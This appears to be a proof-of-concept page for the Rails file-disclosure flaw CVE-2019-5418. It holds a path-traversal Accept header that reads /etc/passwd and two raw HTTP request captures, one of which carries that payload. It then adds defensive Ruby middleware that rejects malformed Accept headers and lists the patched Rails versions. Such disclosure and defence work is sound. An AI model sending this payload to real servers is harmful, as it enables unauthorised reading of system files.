# File Content Disclosure on Rails Test Case - CVE-2019-5418

Run:
```sh
$ rails s
```
PoC (request header):
```http
Accept: ../../../../../../../../etc/passwd{{
```
---
Req 1:
```http
GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: diyarbakir_guzel_baglar_delale_lorke <------ CATCH
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

Req 2:
```http
GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: ../../../../../../../../etc/passwd{{
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

Source: [File Content Disclosure on Rails - CVE-2019-5418](https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/)
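As an added, defender-side example that is not part of this PoC repository or of Rails itself: a Rack-style middleware that answers 406 to any request whose `Accept` header is not a list of syntactically valid media ranges (RFC 7231), which is exactly the property the payload in Req 2 violates. The names `AcceptHeaderGuard`, `valid_accept?` and `accept_header` are hypothetical, and the sample input is a trimmed copy of Req 2 above.

```ruby
# Added example, not part of this PoC repository. Rack middleware is any object
# with #call(env), so this runs without the rack gem; in the app it would be
# mounted with `config.middleware.use AcceptHeaderGuard` (assumed, hypothetical name).

# RFC 7230 token characters; "/", "{", "}" and whitespace are deliberately absent.
TOKEN = /[!$#%&'*+\-.^_`|~0-9A-Za-z]+/
# RFC 7231 media-range: type "/" subtype, then optional ";name=value" parameters.
MEDIA_RANGE = /\A(\*|#{TOKEN})\/(\*|#{TOKEN})(\s*;\s*#{TOKEN}=(#{TOKEN}|"[^"]*"))*\z/

# True when every comma-separated element is a well-formed media range.
# A missing or blank header is fine: Rails then falls back to its defaults.
def valid_accept?(value)
  return true if value.nil? || value.strip.empty?
  value.split(",").all? { |range| MEDIA_RANGE.match?(range.strip) }
end

# Pull the Accept value out of a raw request capture like Req 1 / Req 2 above.
def accept_header(raw_request)
  line = raw_request.lines.find { |l| l.match?(/\AAccept:/i) }
  line && line.split(":", 2)[1].strip
end

class AcceptHeaderGuard
  def initialize(app)
    @app = app
  end

  def call(env)
    return @app.call(env) if valid_accept?(env["HTTP_ACCEPT"])
    # Log for detection; the raw value is never echoed back into the response.
    warn "AcceptHeaderGuard: rejected Accept #{env['HTTP_ACCEPT'].inspect} from #{env['REMOTE_ADDR']}"
    [406, { "Content-Type" => "text/plain" }, ["Not Acceptable"]]
  end
end

# Trimmed copy of Req 2 from this page, used as sample input (constructed).
RAW_REQ2 = <<~HTTP
  GET /shitblock HTTP/1.1
  Host: REDACTED:3000
  Accept: ../../../../../../../../etc/passwd{{
  Connection: close
HTTP

if __FILE__ == $PROGRAM_NAME
  guard = AcceptHeaderGuard.new(->(_env) { [200, {}, ["ok"]] })
  p guard.call("HTTP_ACCEPT" => "text/html,application/xml;q=0.9,*/*;q=0.8")[0]  # 200
  p guard.call("HTTP_ACCEPT" => accept_header(RAW_REQ2))[0]                         # 406
end
```

This is a compensating control and a detection hook, not the fix: the fix is upgrading to a Rails release that addresses CVE-2019-5418 (5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 or 6.0.0.beta3). Note that Req 1's marker value also fails the grammar (no type/subtype slash), so the guard logs it too.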